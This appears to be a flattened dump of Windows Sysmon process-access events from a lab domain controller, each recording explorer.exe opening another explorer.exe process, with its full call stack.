22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 